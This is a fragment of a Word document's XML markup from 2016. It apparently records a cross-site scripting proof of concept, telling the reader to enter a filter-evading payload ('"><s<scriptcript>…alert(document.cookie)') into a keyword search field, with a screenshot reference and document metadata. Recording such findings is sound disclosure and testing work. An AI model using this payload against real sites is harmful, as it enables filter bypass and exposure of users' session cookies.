    <w:p w14:paraId="2E01CC12" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B6A8C" w14:textId="1528AE01" w:rsidR="009661B3" w:rsidRPr="00F01CBB" w:rsidRDefault="00C40C37" w:rsidP="00A02422">
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">Put into keyword search column: </w:t>
      </w:r>
      <w:r w:rsidR="00A02422" w:rsidRPr="00F01CBB">
        <w:t>"&gt;&lt;s&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A02422" w:rsidRPr="00F01CBB">
        <w:t>scriptcript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A02422" w:rsidRPr="00F01CBB">
        <w:t>&gt; a&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A02422" w:rsidRPr="00F01CBB">
        <w:t>scriptlert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A02422" w:rsidRPr="00F01CBB">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A02422" w:rsidRPr="00F01CBB">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A02422" w:rsidRPr="00F01CBB">
        <w:t>);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A14CE" w14:textId="20AD364B" w:rsidR="008E2DB9" w:rsidRPr="00F01CBB" w:rsidRDefault="008E2DB9" w:rsidP="00A02422">
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3008910C" wp14:editId="21D7572D">
            <wp:extent cx="6184900" cy="1089025"/>
            <wp:effectExtent l="0" t="0" r="1270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C0AD" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidSect="00027FA2">
      <w:pgSz w:w="11900" w:h="16840"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080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1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7FA2"/>
    <w:rsid w:val="00027FA2"/>
    <w:rsid w:val="00044911"/>
    <w:rsid w:val="00065F53"/>
    <w:rsid w:val="000B773D"/>
    <w:rsid w:val="000E0AD4"/>
    <w:rsid w:val="000E2DBF"/>
    <w:rsid w:val="00145468"/>
    <w:rsid w:val="00244683"/>
    <w:rsid w:val="00281569"/>
    <w:rsid w:val="002E1A11"/>
    <w:rsid w:val="002F6E80"/>
    <w:rsid w:val="00373072"/>
    <w:rsid w:val="003D1652"/>
    <w:rsid w:val="00441800"/>
    <w:rsid w:val="00483FBD"/>
    <w:rsid w:val="00485089"/>
    <w:rsid w:val="004B1114"/>
    <w:rsid w:val="005126E7"/>
    <w:rsid w:val="00536B22"/>
    <w:rsid w:val="00541B28"/>
    <w:rsid w:val="00555970"/>
    <w:rsid w:val="00596BAE"/>
    <w:rsid w:val="0060512A"/>
    <w:rsid w:val="00651A93"/>
    <w:rsid w:val="00675E7B"/>
    <w:rsid w:val="00765481"/>
    <w:rsid w:val="007E2460"/>
    <w:rsid w:val="008220F9"/>
    <w:rsid w:val="00861E55"/>
    <w:rsid w:val="008C1DA8"/>
    <w:rsid w:val="008E2DB9"/>
    <w:rsid w:val="008F38FE"/>
    <w:rsid w:val="00927771"/>
    <w:rsid w:val="009661B3"/>
    <w:rsid w:val="00970C72"/>
    <w:rsid w:val="00996318"/>
    <w:rsid w:val="00A02422"/>
    <w:rsid w:val="00A05EF8"/>
    <w:rsid w:val="00A23D01"/>
    <w:rsid w:val="00B21D9D"/>
    <w:rsid w:val="00C40C37"/>
    <w:rsid w:val="00C553EA"/>
    <w:rsid w:val="00C97B85"/>
    <w:rsid w:val="00CC1337"/>
    <w:rsid w:val="00D159CC"/>
    <w:rsid w:val="00D66372"/>
    <w:rsid w:val="00DC3BA6"/>
    <w:rsid w:val="00E131DF"/>
    <w:rsid w:val="00E2636E"/>
    <w:rsid w:val="00EE2A75"/>
    <w:rsid w:val="00F01CBB"/>
    <w:rsid w:val="00F7125B"/>
    <w:rsid w:val="00FA0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0D7D3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065F53"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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075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8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2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0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7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33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png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248</Words>
  <Characters>1417</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>11</Lines>
  <Paragraphs>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Jiani Li</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jiani Li</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2016-11-06T20:41:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-06T20:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-16T18:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>